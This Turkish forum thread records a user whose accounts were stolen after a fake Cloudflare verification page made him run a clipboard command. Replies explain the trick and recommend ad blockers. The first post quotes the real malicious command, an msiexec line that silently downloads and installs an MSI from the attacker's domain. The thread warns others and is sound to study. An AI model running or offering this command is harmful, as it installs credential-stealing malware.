Kioxia_Techolay
Kioxia_Techolay_Mobile

Sahte Cloudflare doğrulama sitesi bütün hesaplarımı çaldı

akinjinakininakinakisi

akinjinakininakinakisi

Çalışkan
Katılım
27 Ekim 2024
Mesajlar
27
Beğeniler
15
Arkadaşlar birkaç gün önce nasıl buna kandığımı bilmiyorum ama bir siteden 1080p YouTube videosu indirmeye çalışıyordum ve karşıma ekte gördüğünüz gibi bir "Cloudflare doğrulaması" geldi. Ben de buna kandım tabii ki hatta artık bot testlerinin çok daha geliştiğini sandım ama yanılmışım. İlk önce benim panoma bir şey kaydetti nasıl yaptı bilmiyorum ama benden Windows tuşu + R ye basarak Windows'un çalıştır penceresine girmemi istedi ve panomdaki şeyi yapıştırıp o komutu çalıştırmamı istedi. Hatta komut da bu:

UYARI! ÇALIŞTIRMAYIN!
Kod: 
msiexec /qn /i https://clloudverify.com/i.msi

(Bilgisayarımı resetlemeden önce CMD'yi açacakken logda gördüm) bunu çalıştırdım ve biraz sonra bana ekranda bir kod verdi bunu siteye girdim ve indirmem başladı. Ben de bir şey olmadı sandım. Ta ki Discord hesabım çalınana kadar. Ve ayrıca ben evde babamla bilgisayarı paylaşıyorum da diyebiliriz çünkü çalıştığı yer uzak olduğu için genelde benim bilgisayarımdan Chrome desktop üzerinden kendi iş bilgisayarına bağlanıyor ve bu yüzden iş e postası da Chrome da girili. Discord hesabım çalındıktan bir gün sonra babamın iş e postası da çalındı ve bir virüs olduğunu anladım ve hemen MalwareBytes ile tarattım ve kuqol civil Tools yazılımının bir DLL dosyasını tehdit olarak gördü Malwarebytes. Sildim ama bugün de benim yedek Google hesabım çalındı ve anladım ki format atmanın zamanı gelmiş. Siz buna düşmeyin hiçbir internet doğrulaması bilgisayarınız üzerinden bir şey çalıştırmanızı istemez benim gibi olmayın.
 

Dosya Ekleri

  • v3bha9plq3se1.webp
    v3bha9plq3se1.webp
    11,8 KB · Görüntüleme: 37
Son düzenleyen: Moderatör:
Adamlar sahte Cloudflare web sitesinde, bir butonun arkasına gizlenmiş JavaScript koduyla panonuza otomatik olarak metin kopyalamışlar.
Örnek JavaScript kodu:
HTML: 
<!DOCTYPE html>
<html lang="tr">
<head>
  <meta charset="UTF-8">
  <title>Panoya Metin Kopyalama</title>
</head>
<body>

<p id="metin">Panoya koplayanmasını istedikleri metin</p>
<button onclick="metinKopyala()">Metini Kopyala</button>

<script>
  function metinKopyala() {
    const metin= document.getElementById("metin").innerText;
    navigator.clipboard.writeText(metin).catch(() => {
    });
  }
</script>

</body>
</html>
panoya kopyalanan kodu incelediğimde, clloudverify.com sitesine git ve i.msi dosyasını indir(/i ile) ve arkaplanda(/qn ile) çalıştır şeklinde. Geçmiş olsun.
 
Video vb. indirme siteleri genel olarak sahte site açıyorlar. Mümkünse telefonda Soul Browser kullanın. Açılır pencere engelleme ayarını yüksek yapın. Bilgisayarda ise Ublock Origin ile o sayfaya özel açılır pencereleri engelleyin. Tarayıcınız Ublock Origin desteklemiyorsa Brave, Firefox veya şu anlık Edge ile bu indirmeleri yapın. Bilgisayar için IDM gibi indirme yöneticileri de bir alternatif.
www.internetdownloadmanager.com.tr

Internet Download Manager Türkiye - 30 günlük ücretsiz kullanım

Internet Download Manager - IDM 1 yıllık veya ömür boyu seri numarası Türkiye yetkili satıcısı
www.internetdownloadmanager.com.tr

2025-06-30_15-50.webp


Ayrıca videoda da bahsedildiği gibi reklam engelleyici kullanın. Hatta reklam engelleyicinin yanına Privacy Badger öneririm. Privacy Badger daha detaylı bir engelleme yaptığından, genel olarak sitelerin tükettiği kaynağı da azaltıyor. Bazı akılsızlar sitelerine Discord, Twitter, YouTube vb. gönderilerini sabit gömüyorlar. Bunlar harici sitelerde akıcı çalışmadığından, o sitelerdeki sayfa kaydırması gibi şeylerin performansını da bozuyor. PB bir miktar o performans sorunlarını da çözüyor.
privacybadger.org

Privacy Badger

privacybadger.org privacybadger.org

Bunlar sadece reklam engellemiyor. Zararlı bağlantı, yönlendirme vb. engelliyor. Reklamların çoğunda da bu zararlılar olabiliyor. Yani bazen site sahipleri falan kendileri de bu işten para kazandığından reklam engelleyici kullanmıyor. Ama bu engelleme uzantılarında, para kazandırmak istediğin, zararlı reklam barındırmayan siteler için kapatma var. Yani bu uzantıları kullanın.

 
Bu arada arkadaşlar bilgisayarımı resetledim ama tam şifrelerimi de değiştirecekken steam hesabım da çalındı galiba bilgisayarı resetlemeden logları kendilerine atmışlar.
 

Benzer konular

H
  • Soru Soru
Sahte Cloudflare sitesinden virüs bulaşır mı?
2
Mesaj
11
Görüntüleme
151
Afterbyte
Afterbyte
1
  • Çözüldü
Çözüldü Cloudflare doğrulama güvenilir mi?
3 4 5
Mesaj
42
Görüntüleme
741
hasanmerkit
hasanmerkit
VenomBey
  • Çözüldü
Çözüldü Sahte GitHub sitesi nasıl anlaşılır?
Mesaj
4
Görüntüleme
162
VenomBey
VenomBey
S
Sahte ElAmigos sitesi güvenli mi?
Mesaj
5
Görüntüleme
193
sağlık olsun
S
faruk techolas destek
Sahte linkten virüs bulaşır mı?
Mesaj
4
Görüntüleme
147
selorr
selorr

Yeni konular

Yeni mesajlar

Geri
Yukarı Alt